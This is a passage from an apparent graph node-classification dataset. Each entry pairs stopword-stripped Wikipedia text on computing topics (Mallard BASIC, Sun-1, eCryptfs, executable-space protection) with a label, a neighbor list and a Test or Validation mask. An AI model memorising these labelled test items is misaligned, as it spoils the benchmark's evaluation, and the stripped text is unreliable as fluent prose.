      10475,
      5361,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      8474,
      10016,
      292,
      10235,
      2345,
      7983,
      6448,
      11568,
      2355,
      7477,
      823,
      8503,
      4409,
      6459,
      7483,
      7999,
      3904,
      11075,
      10564,
      1349,
      4423,
      10568,
      10569,
      5452,
      6988,
      8524,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      6502,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      3446,
      3960,
      376,
      8573,
      7039,
      4992,
      6529,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      7076,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      11187,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      2507,
      9166,
      1999,
      2519,
      10730,
      10731,
      8687,
      3056,
      5105,
      6128,
      5619,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 1805,
    "label": 9,
    "text": "Mallard_BASIC:mallard basic mallard basic basic interpreter cp/m written locomotive software supplied amstrad pcw range small business computers zx spectrum +3 version cp/m plus acorn bbc micro z80 second processor 1980s standard industry practice bundle basic interpreter microcomputers pcw followed practice primarily wordprocessor business use dedicated wp also ran cp/m operating system though existing implementations basic cp/m digital research cbasic third-party zbasic followed earlier 1970s model compilers fed source code prepared separate text editor mallard like traditional micro rom basic integrated editor tailored pcw non-standard 90-column screen although pcw actually excellent monochrome graphics support time specification closely comparable hercules graphics card pc mallard basic graphics support whatsoever instead locomotive optimised business use instance full isam random-access file support making easier write database applications also optimised speed named lner a4 class 4468 mallard locomotive fastest steam locomotive world displaying company fondness railway-oriented nomenclature instance see company name fact locomotive name came phrase run like train theme used name mallard basic locomotive product named anything railway-oriented acorn version designed simply run compact software small business accounting products acorn including target z80 second processor small businesses mallard major innovation designed specifically acorn addition jetsam b*-tree keyed access filing system give similar superior features miksam product compact originally designed around graphics could implemented loading gsx extension cp/m cumbersome basic programmers lack graphics support rectified several basic toolkits popular lightning extended basic leb—see external links patched mallard basic replacing redundant let keyword leb could followed wide variety parameters allow sophisticated graphics time drawn screen saved disc printed et cetera probably widespread mallard application ever rped text editor supplied pcw name short roland perry editor program put together quickly roland perry amstrad executive running computer product development realised cp/m-80 came usable full-screen editor users requirement edit configuration files problem apparent dos plus ms-dos supplied ibm-compatible amstrad computers rped machines written 8086 assembler mallard basic pc version mallard basic still available locoscript software ms-dos program run windows disc version licence full introduction reference manual",
    "neighbors": [
      3718,
      7691,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      1952,
      3233,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      7343,
      7983,
      11315,
      4409,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      6596,
      10750,
      712,
      8393,
      9166,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      4727,
      11243,
      2541,
      8429,
      9714,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 1806,
    "label": 7,
    "text": "United_Devices:united devices united devices inc. privately held commercial distributed computing company focused use grid computing manage high-performance computing systems enterprise cluster management products services allowed users allocate workloads computers devices throughout enterprises aggregating computing power would normally go unused operated name univa ud time merging univa september 17 2007 founded 1999 austin texas united devices began distributed computing expertise distributed.net seti home although original technical staff organizations remained years april 2001 grid.org formally announced philanthropic non-profit website demonstrate benefits internet-based large scale grid computing later 2002 help ud ntt data launched similar internet-based cell computing project targeting japanese users 2004 ibm united devices worked together start world community grid project another demonstration internet-based grid computing august 2005 united devices acquired paris-based gridxpert company added synergy product lineup 2006 company acknowledged seeing industry shift using grid computing compute-intensive applications towards data center automation business application optimization partly response market shifts reorganization grid.org shut april 27 2007 completing mission demonstrate viability benefits large-scale internet-based grid computing september 17 2007 company announced would merge lisle illinois-based univa operate new name univa ud combined company would offer open source solutions based around globus toolkit continuing sell existing grid products support existing customers june 26 2008 united devices client software world community grid finished role completely relayed boinc 2001 2007 united devices operated series public projects grid.org website part philanthropic effort also acted marketing tool helping spread awareness grid mp product demonstrating platform scalability costs associated operating past projects grid.org financially sponsored part companies including microsoft intel ibm april 27 2007 united devices closed grid.org cancer research project announcement completed mission demonstrate viability benefits large-scale internet-based grid computing",
    "neighbors": [
      11353,
      1185,
      9602,
      5956,
      3282,
      6421,
      2710,
      2040,
      3449,
      7802,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 1807,
    "label": 5,
    "text": "NCSA_Telnet:ncsa telnet ncsa telnet implementation telnet protocol created university illinois urbana-champaign national center supercomputing applications 1986 continuously developed 1995 initial implementation ran mac os microsoft ms-dos provided basic dec vt102 terminal emulation well support multiple simultaneous connections internal ftp server time ncsa telnet first implementation telnet macintosh pc provided ability connect multiple hosts simultaneously time program evolved added features revisions user interface support tektronix 4010/4014 vector terminal emulation protocol downloading viewing raster images added 1987 short-lived version sun microsystems sunos released although pc version ncsa telnet lost popularity microsoft windows widespread use macintosh version remained use throughout 1990s basic tool connectivity academic commercial installations ncsa telnet originally used built-in tcp/ip protocol stack communicate network standard apis became available network communication program adapted use methods notably apple mactcp however built-in stack one completely independently developed tcp/ip stacks use time continued ship software years ncsa telnet released open source software although term yet coined time spawned number spin-off products including",
    "neighbors": [
      1664,
      6657,
      3971,
      7943,
      8584,
      9736,
      6028,
      6171,
      9757,
      10910,
      7713,
      679,
      10791,
      9908,
      4661,
      3639,
      5054,
      9665,
      7364,
      10436,
      10057,
      7885,
      9166,
      4310,
      5078,
      6231,
      2777,
      8281,
      4326,
      11112,
      8169,
      8557,
      494,
      6133,
      4345,
      8443,
      637
    ],
    "mask": "None"
  },
  {
    "node_id": 1808,
    "label": 7,
    "text": "Entera:entera entera middleware product introduced mid-1990s open environment corporation oec early implementation three-tiered client–server model|client–server model development model entera viewed business software collection services rather monolithic application entera designed allow companies build manage large multinational information systems preserving existing investments skill sets hardware software systems multi-tiered architecture solved problems inherent first generation client/server application development including lack scalability software maintenance|manageability application security vendor lock-in entera built industry-standard distributed computing infrastructures supported variety programming language management framework origination oec oec ’ purchase borland software rights entera acquired ecube systems llc 2003 today entera nxtera still used fortune 1000 companies several countries developed maintained marketed ecube systems 1992 open environment corporation “ oec ” located cambridge massachusetts released middleware product called “ oec toolkit. ” product eventually would become known “ entera ” first middleware product sold application server platform subsequent years company added entera three-tier application monitoring called appminder transaction processing system called entera fx next nine years oec sold tens millions dollars worth entera least 300 fortune 1000 customers 1995 oec went public completing initial public offering nasdaq stock exchange ticker continuing develop entera two primary versions software developed transmission control protocol tcp version distributed computing environment dce latter based dcs cell directory service dce endpoint mapper dce threads computer science |threads despite various challenges dce version entera became popular ibm customer base simplified complexity dce development time oec developers began work fourth version entera aimed unifying tcp dce versions used dce endpoint mapper provide stability increased performance newer version implemented multithreading software |multithreading broker persistence prior acquisition oec developed number products including oec toolkit encompass netminder entera workbench oec3270 appminder entera ole entera fx 1996 year going public oec acquired borland borland continued invest entera software peaked popularity time 300 fortune 1000 companies using entera worldwide post-buyout transition phase original entera development team underwent changes entera 4.0 released prematurely causing problems use replacement entera 3.2 borland responded releasing version 4.1 proved stable version 2000 stable version 4.2.1 released next years borland sold hundreds copies entera new former entera customers time borland also developed professional services organizations capable working diverse programming environments november 1997 borland announced acquisition visigenic software vsgn corba vendor developer visibroker visibroker overlapped entera ’ capabilities adding support java programming language |java programming language object computer science |object-orientation degree complexity distributed computing following year borland refocused efforts targeting enterprise applications development spent less time developing entera turned attention visibroker borland changed name inprise fusion “ integrating enterprise. ” new aim integrate borland ’ tools including delphi programming language |delphi c++builder jbuilder visigenic ’ cobra-based visibroker c++ java efforts concentrated visigenic software borland unsuccessfully attempted switch entera users visibroker ultimately discontinuing active development entera 2001 even experiencing growth within customer base borland quietly reallocated entera development resources borland licensed rights entera ecube systems llc 2002 provide migration path existing clients enable development entera platform ecube systems started former oec borland engineers architects still wanted develop product ecube systems continues support develop existing entera installations today latest version entera called nxtera added new technology models allows interoperability contemporary middleware technologies including messaging platforms web service standards soap rest july 2009 micro focus acquired borland 75 million february 2012 micro focus ecube systems announced cooperation delivery middleware consulting today ecube micro focus collaborate variety middleware projects category middleware category distributed computing",
    "neighbors": [
      8122,
      2948,
      10020,
      8262,
      7175,
      10924,
      5677,
      10486,
      7802,
      5404
    ],
    "mask": "Test"
  },
  {
    "node_id": 1809,
    "label": 3,
    "text": "Sun-1:sun-1 sun-1 first generation unix computer workstations servers produced sun microsystems launched may 1982 based cpu board designed andy bechtolsheim graduate student stanford university funded darpa sun-1 systems ran sunos 0.9 port unisoft uniplus v7 port seventh edition unix motorola 68000 microprocessor window system early sun-1 workstations servers used original sun logo series red u laid square rather familiar purple diamond shape used later first sun-1 workstation sold solo systems may 1982 sun-1/100 used original lucasfilm editdroid non-linear editing system sun 1 workstation based stanford university sun workstation designed andy bechtolsheim advised vaughan pratt forest baskett graduate student co-founder sun microsystems heart design multibus cpu memory video display cards cards used sun-1 workstation second-generation design private memory bus allowing memory expanded 2 mb without performance degradation sun 68000 board introduced 1982 powerful single-board computer combined 10 mhz motorola 68000 microprocessor sun designed memory management unit mmu 256 kb zero wait state memory parity 32 kb eprom memory two serial ports 16-bit parallel port intel multibus ieee 796 bus interface single multibus form factor using motorola 68000 processor tightly coupled sun-1 mmu sun 68000 cpu board able support multi-tasking operating system unix included advanced sun designed multi-process two-level memory management unit facilities memory protection code sharing demand paging memory sun-1 mmu necessary motorola 68451 mmu always work correctly 68000 could always restore processor state page fault cpu board included 256 kb memory could replaced augmented two additional memory cards total 2 mb although memory cards used multibus form factor used multibus interface power memory access via smaller private p2 bus synchronous private memory bus allowed simultaneous memory input/output transfers also allowed full performance zero wait state operation memory installing first 1 mb expansion board either 256 kb memory cpu board first 256 kb expansion board disabled on-board i/o included dual serial port uart 16-bit parallel port serial ports implemented intel 8274 uart later nec d7201c uart serial port wired data communications equipment dce port full modem control also console port graphical display installed system serial port b wired data terminal equipment dte port modem control serial ports could also used terminal ports quite often allowing 3 people use one workstation although two graphical displays 16-bit parallel port special purpose port connecting 8-bit parallel port keyboard 8-bit parallel port optical mouse workstations graphical displays parallel port never used general purpose parallel printer port cpu board included fully compatible multibus ieee 796 bus asynchronous bus accommodated devices various transfer rates maintaining maximum throughput 20 address lines could address 1 mb multibus memory 1 mb i/o locations although i/o devices decoded first 64 kb address space sun cpu board fully supported multi-master functionality allowed share multibus dma devices keyboard micro switch 103sd30-2 keytronic p2441 german market memory-mapped bit-mapped frame buffer graphics board resolution 1024×1024 pixels 1024×800 displayed monitor graphics board included hardware accelerate raster operations ball model hd17h 17-inch video display monitor used ethernet board available originally implementing 3 mbit/s xerox parc ethernet specification later upgraded 3com 10 mbit/s version interphase smd 2180 disk controller could installed connect four fujitsu 84 mb m2313k cdc 16.7 mb 8.35 mb fixed 8.35 mb removable 9455 lark drives boards installed 6 7-slot multibus card cage later documentation shows 13- 19-inch color display available color frame buffer resolution 640×512 pixels 640×480 displayed monitor board could display 256 colors palette 16 million ½-inch 9-track reel-to-reel tape drives qic-02 ¼-inch cartridge tape drives also added offering also second generation sun-1 cpu board referred sun-1.5 cpu board sun-1 systems upgraded sun-2 multibus cpu boards identified u suffix model number",
    "neighbors": [
      3328,
      9090,
      9731,
      1158,
      1801,
      4235,
      8207,
      4241,
      4114,
      9363,
      5141,
      2710,
      1818,
      8863,
      7072,
      9343,
      8994,
      1316,
      10789,
      1707,
      2731,
      5677,
      3247,
      9137,
      6322,
      2871,
      4664,
      4285,
      6464,
      7104,
      6338,
      9665,
      10051,
      10436,
      8007,
      1480,
      2895,
      3919,
      597,
      3285,
      10327,
      10200,
      2269,
      5471,
      4960,
      9955,
      11363,
      7269,
      7270,
      11626,
      7148,
      7022,
      5872,
      5233,
      8179,
      11636,
      9333,
      631,
      11129,
      1788,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 1810,
    "label": 6,
    "text": "ECryptfs:ecryptfs ecryptfs enterprise cryptographic filesystem package disk encryption software linux implementation posix-compliant filesystem-level encryption layer aiming offer functionality similar gnupg operating system level part linux kernel since version 2.6.19 ecryptfs package included ubuntu since version 9.04 used implementing ubuntu encrypted home directory feature ecryptfs derived erez zadok cryptfs uses variant openpgp file format encrypted data extended allow random access storing cryptographic metadata including per-file randomly generated session key individual file also encrypts file directory names makes internally longer average one third reason needs uuencode encrypted names eliminate unwanted characters resulting name lowers maximum usable byte name length original file system entry depending used file system lead four times fewer characters example asian utf-8 file names",
    "neighbors": [
      5120,
      2050,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      3629,
      11323,
      9281,
      8772,
      8283,
      4708,
      9836,
      7789,
      7794,
      5749,
      9333,
      6263,
      9335,
      9343,
      4746,
      7818,
      8331,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      7344,
      2230,
      5816,
      1212,
      8380,
      10951,
      4298,
      9420,
      3795,
      4819,
      8404,
      728,
      8410,
      6365,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3323,
      3328,
      11012,
      2314,
      8461,
      6416,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      3382,
      823,
      3909,
      2378,
      4431,
      346,
      2395,
      2397,
      10596,
      6519,
      376,
      11128,
      890,
      7554,
      10631,
      8075,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      1464,
      1978,
      8640,
      8643,
      7126,
      7139,
      1509,
      9189,
      3572,
      11256,
      2045,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1811,
    "label": 7,
    "text": "ShowDocument:showdocument showdocument online web application allows multiple users conduct web meetings upload share review documents remote locations service developed hbr labs company established 2007 users collaborate review documents real time annotations text visible users accessible co-editing idea every user able annotate cause conflicts within sessions main navigation options presenter control given different user well earlier version application contrast allowed users navigate edit causing system drop incomplete edits possible draw write virtual whiteboard stream youtube video group full synchronization feature also exists co-browsing google maps entering open session application done given code number sending\\receiving link email message different file formats uploaded saved either online offline pdf pdf file text edited text edited separate text editor although platform contains text chat intended replace instant messaging software extensive messaging features application paid free version free version limitations audio video options disabled number participants limited sessions time-limited showdocument first developed 2007 september 8 2009 hbr labs released new version included features secure online document storage mobile device support",
    "neighbors": [
      7983,
      8627,
      6797,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 1812,
    "label": 8,
    "text": "Wt_(web_toolkit):wt web toolkit wt pronounced witty open-source widget-centric web framework c++ programming language api resembling qt framework although developed boost incompatible mixed qt also using widget-tree event-driven signal/slot system wt design goal benefit stateful component model used desktop-applications apis applied web development—instead traditional mvc model–view–controller design pattern rather using mvc level web page pushed level individual components library uses desktop software development process support web-specific features including one unique features wt abstraction layer browser rendering model library uses ajax communicating browsers compatible using plain html-form post-backs user agents using progressive bootstrap-method user interface rendered plain html document first provided support browser automatically upgraded use ajax increased interactivity way wt definition popularity c/c++ embedded system environments wt often used devices consequence highly optimized performance detailed overview see features section official website hello world program wt",
    "neighbors": [
      1920,
      1666,
      3462,
      8582,
      1802,
      4490,
      2062,
      9614,
      2576,
      9491,
      148,
      6941,
      9245,
      10526,
      10654,
      803,
      3876,
      8739,
      2470,
      9128,
      4777,
      8618,
      2603,
      5165,
      2222,
      7983,
      4529,
      7987,
      692,
      8883,
      5048,
      7608,
      6074,
      190,
      8639,
      9666,
      1347,
      1348,
      8644,
      4550,
      8771,
      11259,
      1353,
      7629,
      595,
      84,
      4822,
      4056,
      10841,
      6493,
      102,
      4198,
      8554,
      9579,
      5612,
      9834,
      5743,
      8303,
      8304,
      8691,
      2804,
      119,
      9848,
      3705,
      5754,
      9467,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1813,
    "label": 2,
    "text": "List_of_software_package_management_systems:list software package management systems list software package management systems categorized first package format binary source code hybrid operating system family following package management systems distribute apps binary package form i.e. apps compiled ready installed use following package management systems distribute source code apps either user must know compile packages come script automates compilation process example gobolinux recipe file contains information download unpack compile install package using compile tool cases user must provide computing power time needed compile app legally responsible consequences compiling package following unify package management several linux sometimes unix variants based concept recipe file wide variety package management systems common use today proprietary software operating systems handling installation proprietary free packages",
    "neighbors": [
      2560,
      2050,
      10760,
      5644,
      7181,
      2062,
      1555,
      5139,
      8213,
      9237,
      6680,
      10780,
      4637,
      9245,
      3618,
      5155,
      5670,
      9257,
      7722,
      5677,
      1584,
      9266,
      3131,
      6718,
      3649,
      10817,
      8772,
      3667,
      6227,
      2134,
      3162,
      2658,
      11363,
      6244,
      6763,
      9324,
      8303,
      1138,
      2168,
      3705,
      7292,
      7293,
      11391,
      7812,
      8326,
      9353,
      6797,
      10382,
      657,
      2195,
      10900,
      9882,
      10394,
      6301,
      1694,
      4775,
      7847,
      4777,
      6828,
      10933,
      5819,
      190,
      4803,
      10436,
      5833,
      4302,
      6352,
      7889,
      2259,
      3289,
      3802,
      6361,
      8413,
      10973,
      10464,
      1761,
      228,
      741,
      10470,
      231,
      2281,
      4841,
      8937,
      9455,
      7920,
      6393,
      7938,
      11525,
      2310,
      4360,
      7435,
      7947,
      9487,
      8976,
      2321,
      788,
      1813,
      5397,
      1304,
      8476,
      5410,
      3876,
      1833,
      8491,
      6446,
      815,
      7983,
      1842,
      5430,
      823,
      2872,
      6968,
      3395,
      3911,
      3918,
      10063,
      4437,
      4951,
      11095,
      9562,
      9564,
      4957,
      3422,
      863,
      2401,
      2914,
      1379,
      9063,
      8554,
      10091,
      6508,
      7020,
      10096,
      1394,
      7027,
      1396,
      1406,
      3458,
      7555,
      8068,
      3462,
      8582,
      11654,
      2955,
      4493,
      10127,
      2448,
      11155,
      1431,
      1435,
      1952,
      6049,
      9121,
      9637,
      10149,
      935,
      5031,
      1456,
      6583,
      9660,
      10172,
      9151,
      10687,
      8644,
      9671,
      4040,
      457,
      5578,
      5067,
      5070,
      463,
      8147,
      2010,
      9693,
      9696,
      11232,
      1506,
      7140,
      2021,
      8676,
      6119,
      5096,
      9190,
      5612,
      10732,
      1522,
      1524,
      2036,
      3573,
      5620
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1814,
    "label": 4,
    "text": "X-Wrt:x-wrt x-wrt discontinued set packages patches provide web interface linux distribution openwrt based haserl nothing x window system allows web based management openwrt device originally created package openwrt white russian present found openwrt trunk webif package newer features dual-band support may present 31 october 2013 x-wrt homepage moved google code x-wrt extension openwrt end-user openwrt prior release 8.09 minimal web-management console whereas x-wrt supplied enhanced web-management console webif² 40 control status pages router webif² pages include graphical traffic system status monitoring pages control status network wireless security controls provided data logging booting cron nvram file editing linux package management snmp backup restore firmware upgrade wan vlan wi-fi wep wpa wds mac filtering firewall port forwarding dhcp dnsmasq hostnames ip control routing upnp qos dyndns wol openvpn pptp hotspots",
    "neighbors": [
      2825,
      5387,
      1164,
      1436,
      3366,
      7082,
      3885,
      686,
      7983,
      2228,
      2996,
      3133,
      3007,
      10303,
      10433,
      5959,
      9927,
      5322,
      5067,
      11086,
      7887,
      10451,
      9048,
      10329,
      5978,
      1754,
      10332,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 1815,
    "label": 4,
    "text": "Steven_Murdoch:steven murdoch steven james murdoch security researcher computer science department university college london research covers privacy-enhancing technology internet censorship anonymous communication particular tor also known discovering several vulnerabilities emv bank chipcard payment system chip pin murdoch educated university cambridge completing phd computer security supervised markus kuhn 2008",
    "neighbors": [
      7652,
      2558,
      1783
    ],
    "mask": "None"
  },
  {
    "node_id": 1816,
    "label": 1,
    "text": "Flyway_(software):flyway software flyway open source database migration tool flyway based around seven basic commands migrate clean info validate undo baseline repair migrations written sql database-specific syntax pl/sql t-sql etc supported java advanced data transformations dealing lobs command-line client java api also works android migrating database application startup maven plugin gradle plugin plugins available spring boot dropwizard grails play sbt ant griffon grunt ninja supported databases oracle sql server db2 mysql including amazon rds aurora mysql mariadb percona xtradb postgresql including amazon rds heroku aurora postgresql cockroachdb redshift informix h2 hsql derby sqlite sap hana sybase ase phoenix firebird flyway received 11,500,000 downloads 2018 alone january 2015 flyway placed adopt section thoughtworks technology radar june 2019 flyway acquired redgate",
    "neighbors": [
      270,
      11030,
      8217,
      4255,
      5546,
      1579,
      5677,
      9389,
      7983,
      8495,
      10413,
      10681,
      9661,
      6850,
      5960,
      8539,
      10340,
      8683,
      5612,
      7022,
      7157,
      4604,
      9471
    ],
    "mask": "None"
  },
  {
    "node_id": 1817,
    "label": 7,
    "text": "Feng_Office_Community_Edition:feng office community edition feng office community edition formerly opengoo open-source collaboration platform developed supported feng office opengoo community fully featured online office suite similar set features online office suites like g suite microsoft office live zimbra libreoffice online zoho office suite application downloaded installed server feng office could also categorized collaborative software personal information manager software feng office community edition main features include project management document management contact management e-mail time management text documents presentations created edited online files uploaded organized shared independent file formats organization information feng office community edition done using workspaces tags application presents information stored using different interfaces lists dashboards calendar views feng office community edition distributed gnu affero general public license version 3 feng office uses php javascript ajax extjs mysql technology several open source projects served basis development activecollab last open sourced release used initial code base includes ckeditor online document editing server could run operating system system needs following packages client side user required use modern web browser opengoo started degree project faculty engineering university republic uruguay project presented championed software engineer conrado viña software engineers marcos saiz ignacio de soto developed first prototype thesis professors eduardo fernández tomás laurenzo served tutors conrado ignacio marcos founded opengoo community remain active members core developers thesis approved highest score currently second project opengoo university developed students fernando rodríguez ignacio vázquez juan pedro del campo project aims build open source web-based spreadsheet december 2009 opengoo name changed feng office community edition",
    "neighbors": [
      865,
      9347,
      8644,
      3462,
      3690,
      3691,
      5612,
      6797,
      7022,
      7983,
      11372,
      9010,
      119,
      823,
      11418,
      2046,
      6367
    ],
    "mask": "Test"
  },
  {
    "node_id": 1818,
    "label": 3,
    "text": "SuperSPARC:supersparc supersparc microprocessor implements sparc v8 instruction set architecture isa developed sun microsystems 33 40 mhz versions introduced 1992 supersparc contained 3.1 million transistors fabricated texas instruments ti miho japan 0.8 micrometre triple-metal bicmos process two derivatives supersparc supersparc+ supersparc-ii supersparc+ developed remedy design flaws limited supersparc clock frequency thus performance supersparc-ii introduced 1994 major revision improvements enabled microprocessor reach 85 mhz desktop systems 90 mhz heavily cooled sparcserver-1000e supersparc-ii replaced 1995 64-bit ultrasparc implementation 64-bit sparc v9 isa",
    "neighbors": [
      9090,
      9731,
      1801,
      4235,
      1809,
      4241,
      8863,
      1707,
      2731,
      10926,
      3247,
      6322,
      4664,
      4285,
      6464,
      7104,
      9665,
      4172,
      2895,
      3919,
      597,
      2269,
      9955,
      7270,
      11626,
      5358,
      1776,
      11636,
      630,
      1399,
      11129,
      1788
    ],
    "mask": "Test"
  },
  {
    "node_id": 1819,
    "label": 8,
    "text": "Qwiki:qwiki qwiki new york city based startup automated video production company qwiki released iphone app automatically turns pictures videos user camera roll movies share company initial product ipad application created video summaries 3 million search terms downloaded 3 million times named apple best search reference application 2011 integrating technology bing search engine launching video creation tools major publishers cooperation abc news company launched qwiki iphone received apple editor choice mentioned honoree 2013 webby two categories time inc. named qwiki one “ 10 nyc startups watch ” 2013 company investors include cofounders facebook youtube groupon co-founders qwiki inc. louis monier founder altavista search engine doug imbruce qwiki acquired yahoo july 2 2013 reported 50 million qwiki launched alpha testing mode january 24 2011 winning techcrunch disrupt award 2010 soon google offered buy qwiki 100-150 million declined january 2011 qwiki raised 8 million series financing round led primarily facebook co-founder eduardo saverin investors included jawed karim co-founder youtube pradeep sindhu co-founder juniper networks institutional investors included lerer media ventures tugboat ventures contour venture partners individual investor syndicate arranged new york city-based felix investments january 24 2011 qwiki launched public alpha march 2011 qwiki raised additional 1 million groupon lightbank co-founders brad keywell eric lefkofsky bringing total raised date 10.5 million april 2011 qwiki released ipad app version service application additional feature present web version lets user browse google maps displays qwiki annotations certain points linked content relevant locations seven weeks launch qwiki app downloaded 500,000 times february 2012 qwiki relocated new york city bay area offices order closer major media organizations may 2012 qwiki launched new platform bloggers online publishers including partnership abc news television network used qwiki technology abcnews.com goodmorningamerica.com june 2012 bing announced would display qwiki videos bing search pages wikipedia users able play qwikis without leaving search february 2013 qwiki iphone launched app store editors choice app downloaded 125k times first 6 days launch may 2013 time inc. named qwiki one 10 nyc startups watch 2013 july 2013 yahoo acquires qwiki 50 million september 2014 yahoo announced qwiki would close november 1",
    "neighbors": [
      6539,
      8735,
      9732,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 1820,
    "label": 2,
    "text": "Executable_space_protection:executable space protection computer security executable-space protection marks memory regions non-executable attempt execute machine code regions cause exception makes use hardware features nx bit no-execute bit cases software emulation features however technologies somehow emulate supply nx bit usually impose measurable overhead using hardware-supplied nx bit imposes measurable overhead burroughs 5000 offered hardware support executable-space protection introduction 1961 capability remained successors least 2006 implementation tagged architecture word memory associated hidden tag bit designating code data thus user programs write even read program word data words executed operating system mark writable regions memory non-executable may able prevent stack heap memory areas executable helps prevent certain buffer-overflow exploits succeeding particularly inject execute code sasser blaster worms attacks rely part memory usually stack writeable executable attack fails many operating systems implement available executable space protection policy list systems alphabetical order technologies ordered newest oldest technologies summary gives major features technology supports summary structured technology supplying architecture independent emulation functional processors n't hardware supported supported line processors allow grey-area method explicit nx bit n't exist yet hardware allows one emulated way android 2.3 later architectures support non-executable pages default including non-executable stack heap initial support nx bit x86-64 ia-32 processors support first appeared freebsd -current june 8 2004 freebsd releases since 5.3 release linux kernel supports nx bit x86-64 ia-32 processors support modern 64-bit processors made amd intel transmeta via support feature 64-bit mode x86-64 cpus added 2004 andi kleen later year ingo molnar added support 32-bit mode 64-bit cpus features part linux kernel mainline since release kernel version 2.6.8 august 2004 availability nx bit 32-bit x86 kernels may run 32-bit x86 cpus 64-bit ia-32-compatible cpus significant 32-bit x86 kernel would normally expect nx bit amd64 ia-64 supplies nx enabler patch assures kernels attempt use nx bit present desktop linux distributions fedora ubuntu opensuse enable highmem64 option default default kernels required gain access nx bit 32-bit mode pae mode required use nx bit causes boot failures pre-pentium pro including pentium mmx celeron pentium processors without nx support processors support pae amd k6 earlier transmeta crusoe via c3 earlier geode gx lx vmware workstation versions older 4.0 parallels workstation versions older 4.0 microsoft virtual pc virtual server support pae guest fedora core 6 ubuntu 9.10 later provide kernel-pae package supports pae nx nx memory protection always available ubuntu systems hardware support ran 64-bit kernel 32-bit server kernel 32-bit pae desktop kernel linux-image-generic-pae ubuntu 9.10 later also provides pae mode needed hardware nx cpu feature systems lack nx hardware 32-bit kernels provide approximation nx cpu feature via software emulation help block many exploits attacker might run stack heap memory non-execute functionality also present non-x86 processors supporting functionality many releases red hat kernel developer ingo molnar released linux kernel patch named exec shield approximate utilize nx functionality 32-bit x86 cpus.the exec shield patch released linux kernel mailing list may 2 2003 rejected merging base kernel involved intrusive changes core code order handle complex parts emulation exec shield legacy cpu support approximates nx emulation tracking upper code segment limit imposes cycles overhead context switches intents purposes immeasurable legacy cpus without nx bit exec shield fails protect pages code segment limit mprotect call mark higher memory stack executable mark memory limit executable well thus situations exec shield schemes fails cost exec shield low overhead exec shield checks two elf header markings dictate whether stack heap needs executable called pt_gnu_stack pt_gnu_heap respectively exec shield allows controls set binary executables libraries executable loads library requiring given restriction relaxed executable inherit marking restriction relaxed pax nx technology emulate nx functionality use hardware nx bit pax works x86 cpus nx bit 32-bit x86 linux kernel still ship pax may 2007 patch must merged manually pax provides two methods nx bit emulation called segmexec pageexec segmexec method imposes measurable low overhead typically less 1 constant scalar incurred due virtual memory mirroring used separation execution data accesses segmexec also effect halving task virtual address space allowing task access less memory normally could problem task requires access half normal address space rare segmexec cause programs use system memory i.e ram restricts much access 32-bit cpus becomes 1.5 gb rather 3 gb pax supplies method similar exec shield approximation pageexec speedup however higher memory marked executable method loses protections cases pax falls back older variable-overhead method used pageexec protect pages cs limit may become quite high-overhead operation certain memory access patterns pageexec method used cpu supplying hardware nx bit hardware nx bit used thus significant overhead incurred pax supplies mprotect restrictions prevent programs marking memory ways produce memory useful potential exploit policy causes certain applications cease function disabled affected programs pax allows individual control following functions technology binary executable pax ignores pt_gnu_stack pt_gnu_heap past pax configuration option honor settings option removed security reasons deemed useful results pt_gnu_stack normally attained disabling mprotect restrictions program normally mprotect stack load may always true situations fails simply disabling pageexec segmexec effectively remove executable space restrictions giving task protections executable space non-pax system macos intel supports nx bit cpus supported apple mac os x 10.4.4 – first intel release – onwards mac os x 10.4 supported nx stack protection mac os x 10.5 64-bit executables nx stack heap w^x protection includes x86-64 core 2 later 64-bit powerpc g5 macs netbsd 2.0 later december 9 2004 architectures support non-executable stack heap architectures per-page granularity consist alpha amd64 hppa i386 pae powerpc ibm4xx sh5 sparc sun4m sun4d sparc64 architectures support region granularity i386 without pae powerpc macppc architectures benefit non-executable stack heap netbsd default use software emulation offer features architectures technology openbsd operating system known w^x marks writable pages default non-executable processors support 32-bit x86 processors code segment set include part address space provide level executable space protection openbsd 3.3 shipped may 1 2003 first include w^x solaris supported globally disabling stack execution sparc processors since solaris 2.6 1997 solaris 9 2002 support disabling stack execution per-executable basis added starting windows xp service pack 2 2004 windows server 2003 service pack 1 2005 nx features implemented first time x86 architecture executable space protection windows called data execution prevention dep windows xp server 2003 nx protection used critical windows services exclusively default x86 processor supported feature hardware nx features turned automatically windows xp/server 2003 default feature supported x86 processor protection given early implementations dep provided address space layout randomization aslr allowed potential return-to-libc attacks could feasibly used disable dep attack pax documentation elaborates aslr necessary proof-of-concept produced detailing method dep could circumvented absence aslr may possible develop successful attack address prepared data corrupted images mp3s known attacker microsoft added aslr functionality windows vista windows server 2008 platform dep implemented automatic use pae kernel 32-bit windows native support 64-bit kernels windows vista dep works marking certain parts memory intended hold data nx xd bit enabled processor understands non-executable windows version vista 